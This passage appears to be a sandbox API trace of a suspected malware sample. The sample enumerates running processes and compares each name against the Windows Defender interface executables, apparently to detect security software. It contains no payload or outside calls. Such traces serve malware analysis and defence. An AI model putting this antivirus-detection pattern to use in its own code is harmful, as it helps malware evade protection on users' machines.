szExeFile="OfficeClickToRun.exe")) returned 1 [0140.073] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MSASCuiL.exe") returned 1 [0140.073] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0140.074] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.074] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="measurements-cocktail-motivation.exe")) returned 1 [0140.074] lstrcmpiW (lpString1="measurements-cocktail-motivation.exe", lpString2="MSASCuiL.exe") returned -1 [0140.074] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur_travelling_usage.exe")) returned 1 [0140.075] lstrcmpiW (lpString1="arthur_travelling_usage.exe", lpString2="MSASCuiL.exe") returned -1 [0140.075] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zdnet.exe")) returned 1 [0140.076] lstrcmpiW (lpString1="zdnet.exe", lpString2="MSASCuiL.exe") returned 1 [0140.076] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zufilmenyc.exe")) returned 1 [0140.077] lstrcmpiW (lpString1="zufilmenyc.exe", lpString2="MSASCuiL.exe") returned 1 [0140.077] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bangbus.exe")) returned 1 [0140.078] lstrcmpiW (lpString1="bangbus.exe", lpString2="MSASCuiL.exe") returned -1 [0140.078] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dee_flour.exe")) returned 1 [0140.079] lstrcmpiW (lpString1="dee_flour.exe", lpString2="MSASCuiL.exe") returned -1 [0140.079] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressionmed.exe")) returned 1 [0140.080] lstrcmpiW (lpString1="expressionmed.exe", lpString2="MSASCuiL.exe") returned -1 [0140.080] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inclusive.exe")) returned 1 [0140.082] lstrcmpiW (lpString1="inclusive.exe", lpString2="MSASCuiL.exe") returned -1 [0140.082] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovation-painful-resulting.exe")) returned 1 [0140.083] lstrcmpiW (lpString1="innovation-painful-resulting.exe", lpString2="MSASCuiL.exe") returned -1 [0140.083] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="political-guide.exe")) returned 1 [0140.084] lstrcmpiW (lpString1="political-guide.exe", lpString2="MSASCuiL.exe") returned 1 [0140.084] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blvd.exe")) returned 1 [0140.085] lstrcmpiW (lpString1="blvd.exe", lpString2="MSASCuiL.exe") returned -1 [0140.085] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mails_users.exe")) returned 1 [0140.086] lstrcmpiW (lpString1="mails_users.exe", lpString2="MSASCuiL.exe") returned -1 [0140.086] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trading.exe")) returned 1 [0140.087] lstrcmpiW (lpString1="trading.exe", lpString2="MSASCuiL.exe") returned 1 [0140.087] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0140.088] lstrcmpiW (lpString1="declare.exe", lpString2="MSASCuiL.exe") returned -1 [0140.088] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sake_psp.exe")) returned 1 [0140.089] lstrcmpiW (lpString1="sake_psp.exe", lpString2="MSASCuiL.exe") returned 1 [0140.089] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="renewable-loss-purpose.exe")) returned 1 [0140.090] lstrcmpiW (lpString1="renewable-loss-purpose.exe", lpString2="MSASCuiL.exe") returned 1 [0140.090] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation large.exe")) returned 1 [0140.091] lstrcmpiW (lpString1="nation large.exe", lpString2="MSASCuiL.exe") returned 1 [0140.091] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conflicts_thermal_himself.exe")) returned 1 [0140.092] lstrcmpiW (lpString1="conflicts_thermal_himself.exe", lpString2="MSASCuiL.exe") returned -1 [0140.092] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wonder_transmit_petersburg.exe")) returned 1 [0140.093] lstrcmpiW (lpString1="wonder_transmit_petersburg.exe", lpString2="MSASCuiL.exe") returned 1 [0140.093] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0140.094] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MSASCuiL.exe") returned 1 [0140.094] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.095] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.095] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0140.096] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MSASCuiL.exe") returned 1 [0140.096] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0140.097] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCuiL.exe") returned 1 [0140.097] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.099] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.099] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.100] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0140.100] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0140.101] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCuiL.exe") returned -1 [0140.101] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x894, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0140.102] lstrcmpiW (lpString1="powershell.exe", lpString2="MSASCuiL.exe") returned 1 [0140.102] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp7149.exe")) returned 1 [0140.103] lstrcmpiW (lpString1="tmp7149.exe", lpString2="MSASCuiL.exe") returned 1 [0140.103] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x528, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x668, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.104] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0140.104] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x668, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.105] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0140.105] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0140.105] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCuiL.exe") returned -1 [0140.105] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0140.106] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCuiL.exe") returned -1 [0140.106] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0140.107] CloseHandle (hObject=0x128) returned 1 [0140.107] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x12c [0140.111] Process32FirstW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.111] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCui.exe") returned -1 [0140.111] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0140.112] lstrcmpiW (lpString1="System", lpString2="MSASCui.exe") returned 1 [0140.112] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0140.113] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCui.exe") returned 1 [0140.113] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.113] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1 [0140.113] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0140.114] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCui.exe") returned 1 [0140.114] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.115] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1 [0140.115] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0140.115] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCui.exe") returned 1 [0140.115] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0140.116] lstrcmpiW (lpString1="services.exe", lpString2="MSASCui.exe") returned 1 [0140.116] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0140.117] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCui.exe") returned -1 [0140.117] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0140.117] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCui.exe") returned -1 [0140.117] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.118] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.118] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.119] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.119] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.120] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.120] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.121] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.121] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.122] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.122] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0140.123] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCui.exe") returned -1 [0140.123] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.124] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.124] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0140.125] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCui.exe") returned -1 [0140.125] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0140.126] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCui.exe") returned -1 [0140.126] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.127] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.127] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0140.128] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCui.exe") returned 1 [0140.128] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0140.129] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1 [0140.129] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.136] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.136] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0140.137] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MSASCui.exe") returned 1 [0140.137] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0140.138] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCui.exe") returned 1 [0140.138] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0140.139] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MSASCui.exe") returned 1 [0140.139] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0140.140] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1 [0140.140] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="measurements-cocktail-motivation.exe")) returned 1 [0140.141] lstrcmpiW (lpString1="measurements-cocktail-motivation.exe", lpString2="MSASCui.exe") returned -1 [0140.141] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur_travelling_usage.exe")) returned 1 [0140.142] lstrcmpiW (lpString1="arthur_travelling_usage.exe", lpString2="MSASCui.exe") returned -1 [0140.142] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zdnet.exe")) returned 1 [0140.143] lstrcmpiW (lpString1="zdnet.exe", lpString2="MSASCui.exe") returned 1 [0140.143] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zufilmenyc.exe")) returned 1 [0140.144] lstrcmpiW (lpString1="zufilmenyc.exe", lpString2="MSASCui.exe") returned 1 [0140.144] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bangbus.exe")) returned 1 [0140.145] lstrcmpiW (lpString1="bangbus.exe", lpString2="MSASCui.exe") returned -1 [0140.145] 